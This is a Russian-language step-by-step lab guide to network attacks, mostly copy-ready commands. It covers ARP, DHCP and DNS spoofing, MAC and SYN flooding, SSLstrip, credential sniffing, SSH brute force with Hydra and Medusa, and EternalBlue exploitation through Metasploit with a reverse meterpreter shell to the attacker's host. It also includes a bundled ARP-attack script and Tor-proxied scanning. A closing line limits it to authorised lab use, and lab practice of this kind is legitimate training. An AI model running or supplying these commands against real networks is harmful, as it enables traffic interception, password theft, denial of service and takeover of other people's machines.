🌐 ПРАКТИКА СЕТЕВЫХ АТАК И ПРОТОКОЛОВ
Лабораторная среда
Для практики тебе понадобятся:
Kali Linux (твоя машина)
Целевая машина: Metasploitable 2, Windows XP/7, или любая другая VM в той же сети.
Сеть: Все машины должны быть в одной локальной сети (NAT или Host-Only в VirtualBox).
1. РАЗВЕДКА СЕТИ
1.1. Определение своего IP и сети
Узнай свой IP:
bash
ip a
ifconfig
Узнай шлюз по умолчанию:
bash
route -n
ip route
Определи MAC-адрес:
bash
arp -a
ip neigh
1.2. Сканирование сети
Ping-сканирование (определение живых хостов):
bash
nmap -sn 192.168.1.0/24
Определение ОС и версий служб:
bash
nmap -sV -sC -O 192.168.1.10
Сканирование всех портов (медленно, но тщательно):
bash
nmap -p- 192.168.1.10
Обнаружение скрытых служб (UDP):
bash
nmap -sU -p 53,67,68,69,123,161,162 192.168.1.10
Сканирование с использованием SYN-пакетов (полуоткрытое, скрытное):
bash
nmap -sS -p 80,443,22,21,25 192.168.1.10
1.3. Обнаружение служб вручную
Проверка открытых портов через Netcat:
bash
nc -zv 192.168.1.10 22
nc -zv 192.168.1.10 80
Баннеры служб:
bash
nc 192.168.1.10 22
nc 192.168.1.10 80
HEAD / HTTP/1.0
2. АТАКИ НА АРХИТЕКТУРУ СЕТИ (L2/L3)
2.1. ARP-спуфинг (MITM)
Включи IP-форвардинг (чтобы пересылать трафик):
bash
echo 1 > /proc/sys/net/ipv4/ip_forward
Отравь ARP-таблицу шлюза (IP_ШЛЮЗА = 192.168.1.1, IP_ЖЕРТВЫ = 192.168.1.10):
bash
arpspoof -i eth0 -t 192.168.1.1 192.168.1.10
Отравь ARP-таблицу жертвы:
bash
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
Перехватывай трафик (в отдельном терминале):
bash
tcpdump -i eth0 -w capture.pcap
Анализируй трафик в Wireshark:
bash
wireshark capture.pcap
Остановка:
Нажми Ctrl+C в каждом терминале с arpspoof. Восстанови ARP-таблицы:
bash
arp -d 192.168.1.1
arp -d 192.168.1.10
2.2. DHCP Spoofing
Запусти поддельный DHCP-сервер:
bash
dhcpd -cf /etc/dhcp/dhcpd.conf -lf /var/lib/dhcp/dhcpd.leases eth0
Настрой конфиг /etc/dhcp/dhcpd.conf:
text
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.100 192.168.1.150;
option routers 192.168.1.5; # Твой IP
option domain-name-servers 8.8.8.8;
}
Результат: Все новые устройства в сети получат IP от тебя и будут использовать тебя как шлюз.
2.3. MAC Flooding (Переполнение CAM-таблицы)
Запусти MAC Flooding (требует macof из пакета dsniff):
bash
macof -i eth0 -d 192.168.1.10
Результат: Коммутатор перестаёт работать как коммутатор и начинает транслировать трафик на все порты (атака на канальный уровень).
Остановка: Ctrl+C.
3. АТАКИ НА ТРАНСПОРТНЫЙ УРОВЕНЬ (L4)
3.1. SYN-флуд (DoS)
Атака с помощью hping3:
bash
hping3 -S -p 80 --flood 192.168.1.10
Атака с помощью Nmap:
bash
nmap -p 80 --max-rtt-timeout 100ms --max-scan-delay 10ms -sS 192.168.1.10
Результат: Сервер перестанет отвечать на легитимные запросы.
3.2. TCP RST-атака (Сброс соединения)
Сбрось соединение между жертвой и сервером:
bash
tcpkill -i eth0 host 192.168.1.10 and port 80
Результат: Все TCP-соединения на порт 80 будут разорваны.
3.3. UDP-флуд
bash
udpflood -i eth0 192.168.1.10 123
Результат: Перегрузка UDP-сервиса (NTP, DNS).
4. АТАКИ "ЧЕЛОВЕК ПОСЕРЕДИНЕ" (MITM)
4.1. DNS Spoofing
Запусти поддельный DNS-сервер (используй dnsspoof):
bash
dnsspoof -i eth0 -f /etc/dnsspoof.conf
Настрой файл /etc/dnsspoof.conf:
text
*.target.com 192.168.1.5 # Все запросы к target.com идут на твой IP
Результат: Пользователи открывают поддельный сайт.
4.2. SSLstrip (Удаление HTTPS)
Запусти SSLstrip для перехвата HTTPS-трафика:
bash
sslstrip -l 8080 -k
Настрой IP-форвардинг и iptables:
bash
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
Результат: HTTPS-соединения превращаются в HTTP, и ты можешь видеть все данные.
5. АТАКИ НА ПРИКЛАДНОЙ УРОВЕНЬ (L7)
5.1. Перехват HTTP-трафика
В терминале с включенным IP-форвардингом:
bash
tcpdump -i eth0 -A -s 0 'tcp port 80'
Результат: Видишь все HTTP-запросы в текстовом виде (куки, пароли).
5.2. Подмена содержимого страницы (MITM + HTTP)
Используй webmitm (из пакета dsniff):
bash
webmitm -i eth0 -d 192.168.1.1
Результат: Ты можешь подменять содержимое страниц, которые загружает жертва.
5.3. Атака на FTP
Перехват FTP-логинов:
bash
tcpdump -i eth0 -A 'tcp port 21'
Или через Wireshark:
Открой Wireshark, фильтр: tcp.port == 21.
6. АТАКИ НА SSH
6.1. Брутфорс пароля SSH
Используй hydra:
bash
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
Используй medusa:
bash
medusa -h 192.168.1.10 -u root -P /usr/share/wordlists/rockyou.txt -M ssh
6.2. Атака "человек посередине" на SSH (SSH MITM)
Запусти ssh-mitm (нужно установить):
bash
python3 ssh-mitm.py --remote-host 192.168.1.10
Результат: Ты перехватываешь SSH-сессии и можешь видеть команды.
7. АТАКИ НА SMB
7.1. Сканирование SMB-шаров
bash
nmap -p 445 --script=smb-enum-shares 192.168.1.10
7.2. Подключение к открытому шару
bash
smbclient -L //192.168.1.10
smbclient //192.168.1.10/share -N
7.3. Эксплуатация EternalBlue (CVE-2017-0144)
Используй Metasploit:
bash
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
exploit
Результат: Полный контроль над Windows-системой.
8. ПАССИВНЫЙ АНАЛИЗ ТРАФИКА
8.1. Перехват всех пакетов в сети
bash
tcpdump -i eth0 -w capture.pcap
8.2. Фильтрация по IP
bash
tcpdump -i eth0 host 192.168.1.10
8.3. Фильтрация по порту
bash
tcpdump -i eth0 port 80
8.4. Чтение сохранённого дампа
bash
tcpdump -r capture.pcap
9. ОБХОД БЛОКИРОВОК
9.1. Использование Tor
Установи и запусти Tor:
bash
sudo apt install tor
sudo systemctl start tor
Настрой прокси (используй proxychains):
bash
proxychains nmap -sS 192.168.1.10
9.2. Использование VPN
bash
openvpn --config vpn.ovpn
10. АВТОМАТИЗАЦИЯ
10.1. Скрипт для ARP-спуфинга
Создай файл arp_attack.sh:
bash
#!/bin/bash
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.1 192.168.1.10 &
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 &
tcpdump -i eth0 -w capture.pcap
Запуск:
bash
chmod +x arp_attack.sh
./arp_attack.sh
10.2. Скрипт для сканирования сети
Создай файл scan_network.sh:
bash
#!/bin/bash
echo "[*] Сканирование сети..."
nmap -sn 192.168.1.0/24 > alive_hosts.txt
for ip in $(grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' alive_hosts.txt); do
echo "[*] Сканирование $ip"
nmap -sV -p 22,80,443,445,3306 $ip >> scan_result.txt
done
ВЫВОДЫ
Ты имеешь полный набор инструментов и команд для:
Разведки сети (Nmap, Netcat).
Проведения MITM-атак (ARP, DHCP, DNS).
Атак на транспортный уровень (SYN-flood, RST).
Брутфорса сервисов (SSH, SMB).
Эксплуатации уязвимостей (EternalBlue).
Автоматизации через Bash-скрипты.
Помни: Все эти действия должны выполняться только в твоей лабораторной среде с письменного разрешения владельца сети. Нарушение этого правила является уголовным преступлением.
Практика: Разверни Metasploitable 2, WinXP и практикуйся на них. Это лучший способ закрепить навыки. Удачи.